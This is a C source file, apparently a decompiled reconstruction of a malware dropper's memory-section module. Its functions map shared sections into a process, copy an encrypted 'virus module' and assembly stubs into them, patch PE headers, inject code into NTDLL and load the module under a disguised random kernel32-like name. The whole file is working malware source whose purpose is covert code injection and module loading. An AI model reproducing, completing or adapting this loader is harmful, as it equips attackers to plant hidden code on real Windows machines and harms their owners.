dropper_MemorySections.c

1. #include "6. MemorySections.h"
2. #include "4. Encoding.h"
3. #include "5. Utils.h"
4. #include "7. AssemblyBlock0.h"
5. #include "8. AssemblyBlock1.h"
6. #include "9. AssemblyBlock2.h"
7. #include "A. EncodingAlgorithms.h"
8. #include "C. CodeBlock.h"
9.  
10. #include "config.h"
11. #include "define.h"
12.  
13. // Create the shared section, copy the content
14. // of pUnknownSegment and the decrypted module
15.  
16. // 95% (C) CODE MATCH
17. INT32 LoadVirusModuleSection(HANDLE hHandle, PGENERAL_INFO_BLOCK sInfoBlock, PVOID pVirusModule, INT32 pVirusModuleSize, INT32 iExecEntryNumber, PVOID pUnknownSegment, DWORD pUnknownSegmentSize, PVOID *ppModuleBlock)
18. {
19.     HANDLE hMapHandle; // [sp+4h] [bp-28h]@1
20.     PVOID pVirusImageBase; // [sp+8h] [bp-24h]@3
21.     PIMAGE_NT_HEADERS pImageNT; // [sp+Ch] [bp-20h]@6
22.     INT32 iSectionPointer; // [sp+10h] [bp-1Ch]@1
23.     PVOID pLocalReg; // [sp+14h] [bp-18h]@1
24.     PIMAGE_DOS_HEADER pImageDOS; // [sp+18h] [bp-14h]@3
25.     UINT32 iSectionsSize; // [sp+1Ch] [bp-10h]@1
26.     PVOID pRemoteReg; // [sp+20h] [bp-Ch]@1
27.     PVIRUS_MODULE_BLOCKS_HEADER sVirusModuleBlocksHeader; // [sp+24h] [bp-8h]@3
28.     INT32 nRet; // [sp+28h] [bp-4h]@1
29.  
30.     pLocalReg       = 0;
31.     pRemoteReg      = 0;
32.    
33.     iSectionPointer = 0;
34.     iSectionsSize   = sizeof(VIRUS_MODULE_BLOCKS_HEADER) + pUnknownSegmentSize + pVirusModuleSize;
35.    
36.     // Here we create a shared MapOfView between the current process and the HANDLE at hHandle
37.     nRet = SharedMapViewOfSection(hHandle, iSectionsSize, &hMapHandle, &pLocalReg, &pRemoteReg);
38.     HAS_FAILED(nRet, nRet)
39.    
40.     // First part of the section dedicated to the VIRUS_MODULE_BLOCKS_HEADER
41.     sVirusModuleBlocksHeader = (PVIRUS_MODULE_BLOCKS_HEADER)pLocalReg;
42.     pLocalReg                = (LPVOID)((DWORD)pLocalReg + sizeof(VIRUS_MODULE_BLOCKS_HEADER));
43.     iSectionPointer          = sizeof(VIRUS_MODULE_BLOCKS_HEADER);
44.    
45.     // Copy the content of pUnknownSegment into the shared section
46.     CopySegmentIntoSections(&pLocalReg, pRemoteReg, &iSectionPointer, &sVirusModuleBlocksHeader->UnknownSegment, pUnknownSegment, pUnknownSegmentSize);
47.     pVirusImageBase = pLocalReg;
48.    
49.     // Copy the decrypted module into into the shared section
50.     CopySegmentIntoSections(&pLocalReg, pRemoteReg, &iSectionPointer, &sVirusModuleBlocksHeader->VirusModuleSegment, pVirusModule, pVirusModuleSize);
51.     pImageDOS = (PIMAGE_DOS_HEADER)pVirusImageBase;
52.    
53.     // Check the memory copied (len >= 0x1000), MZ header etc.
54.     if((UINT32)pVirusModuleSize >= 0x1000 &&
55.        pImageDOS->e_magic == MZ_HEADER &&
56.        pImageDOS->e_lfanew + sizeof(IMAGE_OPTIONAL_HEADER) + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD) < (UINT32)pVirusModuleSize) // (UINT32 *)pImageDOS[15] + 248 -> Section ".text"
57.     {
58.         // Check the "Delay Import Directory Size" and change it, not sure why
59.         pImageNT = (PIMAGE_NT_HEADERS)((DWORD)pVirusImageBase + pImageDOS->e_lfanew);
60.         if(pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].Size == 72)
61.             pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].Size = 64; // Change Delay Import Directory Size
62.     }
63.    
64.     // Copy the sInfoBlock
65.     __memcpy(&sVirusModuleBlocksHeader->InformationBlock, sInfoBlock, sizeof(GENERAL_INFO_BLOCK));
66.    
67.     // Copy the entrypoint of the module
68.     sVirusModuleBlocksHeader->LibraryExecuteEntryNumber = iExecEntryNumber;
69.     sVirusModuleBlocksHeader->VirusModulePointer        = 0;
70.    
71.     // Copy the pointer to the module block (section) just created
72.     *ppModuleBlock = pRemoteReg;
73.    
74.     // Close all and return
75.     _F(UnmapViewOfFile)(sVirusModuleBlocksHeader);
76.     _F(ZwClose)(hMapHandle);
77.  
78.     return 0;
79. }
80.  
81. // 96% (C) CODE MATCH
82. INT32 LoadAndInjectVirus(PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader, PVIRUS_MODULE_BLOCKS_HEADER sVirusModuleBlocksHeader, PGENERAL_INFO_BLOCK sInfoBlock)
83. {
84.     HMODULE pVirusModule; // [sp+0h] [bp-90h]@5
85.     HANDLE hMappedAddress; // [sp+4h] [bp-8Ch]@7
86.     INT32 iResult; // [sp+8h] [bp-88h]@1
87.     PHARDCODED_ADDRESSES pHardAddrs; // [sp+Ch] [bp-84h]@1
88.     GENERAL_INFO_BLOCK sInfoBlockCopy; // [sp+10h] [bp-80h]@1
89.  
90.     __memcpy(&sInfoBlockCopy, sInfoBlock, sizeof(GENERAL_INFO_BLOCK)); // Copy the information
91.    
92.     sInfoBlockCopy.OriginalAddress ^= X_PTR_KEY; // Get the original address of the variable sInfoBlock
93.     sInfoBlockCopy.UnknownZero0     = 0;
94.    
95.     // Point to the first block of assembly in the section
96.     pHardAddrs = (PHARDCODED_ADDRESSES)(sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(&g_hardAddrs, __ASM_BLOCK1_0));
97.    
98.     iResult = BLOCK4_LoadVirusModuleInfo(pHardAddrs, &sInfoBlockCopy, (PVOID)sVirusModuleBlocksHeader->VirusModuleSegment.SegmentAddress, sVirusModuleBlocksHeader->VirusModuleSegment.SegmentSize);
99.     if(iResult) return iResult;
100.    
101.     if(BLOCK4_InjectCodeIntoNTDLL(sASMCodeBlocksHeader, pHardAddrs)) return -4;
102.    
103.     /* Load library from the memory */
104.     pVirusModule = pHardAddrs->LoadLibraryW(sInfoBlockCopy.RandomLibraryName);
105.     if(!pVirusModule) return -9;
106.    
107.     sVirusModuleBlocksHeader->VirusModulePointer = pVirusModule;
108.     hMappedAddress = sInfoBlockCopy.MappedAddress;
109.    
110.     if(sInfoBlockCopy.MappedAddress)
111.     {
112.         sInfoBlockCopy.MappedAddress = 0;
113.         pHardAddrs->ZwClose(hMappedAddress);
114.     }
115.    
116.     return 0;
117. }
118.  
119. // 100% (C) CODE MATCH
120. DWORD GetCodeBlockSize(void)
121. {
122.     return _SIZE(BLOCK4_END, BLOCK4_InjectAndExecuteVirus);
123. }
124.  
125. // 100% (C) CODE MATCH
126. DWORD GetCodeBlock(void)
127. {
128.     return (DWORD)BLOCK4_InjectAndExecuteVirus;
129. }
130.  
131. // 100% (C) CODE MATCH
132. DWORD GetRelativeExecuteLibraryPointer(void)
133. {
134.     return _SIZE(BLOCK4_ExecuteLibrary, BLOCK4_InjectAndExecuteVirus);
135. }
136.  
137. // 100% (C) CODE MATCH
138. UINT32 GetRelativeAlignAddressesPointer(void)
139. {
140.     return _SIZE(BLOCK4_AlignAddresses, BLOCK4_InjectAndExecuteVirus);
141. }
142.  
143. // 85% (C) CODE MATCH -> NEED DEBUG
144. INT32 LoadCodeSection(HANDLE hHandle, PVOID pVirusModuleSection, PVOID *ppCodeBlock, PVOID *ppASMBlock)
145. {
146.     PVOID pCodeBlock; // eax@3
147.     HANDLE hMapHandle; // [sp+8h] [bp-28h]@1
148.     INT32 iASMBlock1Pointer; // [sp+Ch] [bp-24h]@3
149.     DWORD *v9; // [sp+10h] [bp-20h]@3
150.     INT32 iSectionPointer; // [sp+14h] [bp-1Ch]@1
151.     PVOID pLocal; // [sp+18h] [bp-18h]@1
152.     UINT32 iSectionsSize; // [sp+1Ch] [bp-14h]@1
153.     PVOID pRemote; // [sp+20h] [bp-10h]@1
154.     PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader; // [sp+24h] [bp-Ch]@3
155.     UINT32 iCodeBlockSize; // [sp+28h] [bp-8h]@1
156.     INT32 nRet; // [sp+2Ch] [bp-4h]@1
157.  
158.     pLocal = 0;
159.     pRemote = 0;
160.    
161.     iCodeBlockSize = GetCodeBlockSize(); // [0xB3A] (2874)
162.     iSectionsSize  = sizeof(ASM_CODE_BLOCKS_HEADER) + _SIZE(__ASM_BLOCK1_0, __ASM_BLOCK0_0) + _SIZE(DecodeModuleNameA, __ASM_BLOCK1_0) + iCodeBlockSize;
163.    
164.     iSectionPointer = 0;
165.    
166.     // Create the shared section
167.     nRet = SharedMapViewOfSection(hHandle, iSectionsSize, &hMapHandle, &pLocal, &pRemote);
168.     HAS_FAILED(nRet, nRet)
169.    
170.     // First part of the section dedicated to the ASM_CODE_BLOCKS_HEADER
171.     sASMCodeBlocksHeader = (PASM_CODE_BLOCKS_HEADER)pLocal;
172.     pLocal               = (LPVOID)((DWORD)pLocal + sizeof(ASM_CODE_BLOCKS_HEADER));
173.     iSectionPointer      = sizeof(ASM_CODE_BLOCKS_HEADER);
174.    
175.     // Copy the 1st block of ASM code into the shared section
176.     CopySegmentIntoSections(&pLocal, pRemote, &iSectionPointer, &sASMCodeBlocksHeader->ASMBlock1Segment, __ASM_BLOCK1_0, _SIZE(DecodeModuleNameA, __ASM_BLOCK1_0));
177.     iASMBlock1Pointer = iSectionPointer;
178.    
179.     // Copy the 2nd block of ASM code into the shared section
180.     CopySegmentIntoSections(&pLocal, pRemote, &iSectionPointer, &sASMCodeBlocksHeader->ASMBlock0Segment, __ASM_BLOCK0_0, _SIZE(__ASM_BLOCK1_0, __ASM_BLOCK0_0));
181.     pCodeBlock = (PVOID)GetCodeBlock();
182.    
183.     // Copy the 3st block of ASM code into the shared section
184.     CopySegmentIntoSections(&pLocal, pRemote, &iSectionPointer, &sASMCodeBlocksHeader->CodeBlockSegment, pCodeBlock, iCodeBlockSize);
185.    
186.     // Copy the address of __ASM_REF_3 in the __ASM_BLOCK0_1
187.     v9 = (DWORD *)((DWORD)sASMCodeBlocksHeader + iASMBlock1Pointer + _SIZE(__ASM_BLOCK0_1, __ASM_BLOCK0_0));
188.     *v9 = (DWORD)sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(__ASM_REF_3, __ASM_BLOCK1_0);
189.    
190.     // Put function address into the memory map
191.     sASMCodeBlocksHeader->ExecuteLibrary = sASMCodeBlocksHeader->CodeBlockSegment.SegmentAddress + GetRelativeExecuteLibraryPointer();
192.     sASMCodeBlocksHeader->AlignAddresses = sASMCodeBlocksHeader->CodeBlockSegment.SegmentAddress + GetRelativeAlignAddressesPointer();
193.     sASMCodeBlocksHeader->VirusModuleSection = (DWORD)pVirusModuleSection;
194.    
195.     // Put the values in the pointers
196.     *ppCodeBlock    = (PVOID)sASMCodeBlocksHeader->CodeBlockSegment.SegmentAddress;
197.     *ppASMBlock     = pRemote;
198.    
199.     // Close all and return
200.     _F(UnmapViewOfFile)(sASMCodeBlocksHeader);
201.     _F(ZwClose)(hMapHandle);
202.    
203.     return 0;
204. }
205.  
206. static BOOL bSetupMode = TRUE;
207.  
208. static PVOID s_ASMCodeBlocksPTR = NULL;
209. static PVOID s_virusBlocksPTR   = NULL;
210. static PVOID s_codeBlockPTR     = NULL;
211.  
212. // 98% (C) CODE MATCH
213. INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, DWORD iVirusModuleSize, HMODULE *hVirusModule)
214. {
215.     INT32 nRet;
216.     GENERAL_INFO_BLOCK sInfoBlock;
217.  
218.     // Get a random module name with the format "KERNEL32.DLL.ASLR.XXXXXXXX"
219.     if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0)
220.         return 0;
221.    
222.     // Decrypt the Kernel32's and NTDLL's function names
223.     if(bSetupMode && DecodeEncryptedModuleNames() == FALSE)
224.         return -12;
225.    
226.     // Create the shared section and copy the data
227.     nRet = LoadVirusModuleSection(GetCurrentProcess(), &sInfoBlock, pVirusModule, iVirusModuleSize, -1, NULL, 0, &s_virusBlocksPTR);
228.     HAS_FAILED(nRet, nRet)
229.    
230.     // If it is still in setup mode load the code
231.     if(bSetupMode)
232.     {
233.         // Create the shared section and copy the code
234.         nRet = LoadCodeSection(GetCurrentProcess(), s_virusBlocksPTR, &s_codeBlockPTR, &s_ASMCodeBlocksPTR);
235.         HAS_FAILED(nRet, nRet)
236.        
237.         bSetupMode = FALSE;
238.     }
239.    
240.     // Unknown
241.     nRet = LoadAndInjectVirus((PASM_CODE_BLOCKS_HEADER)s_ASMCodeBlocksPTR, (PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR, &sInfoBlock);
242.     if(!nRet)
243.         *hVirusModule = ((PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR)->VirusModulePointer;
244.    
245.     _F(UnmapViewOfFile)(s_virusBlocksPTR);
246.    
247.     return nRet;
248. }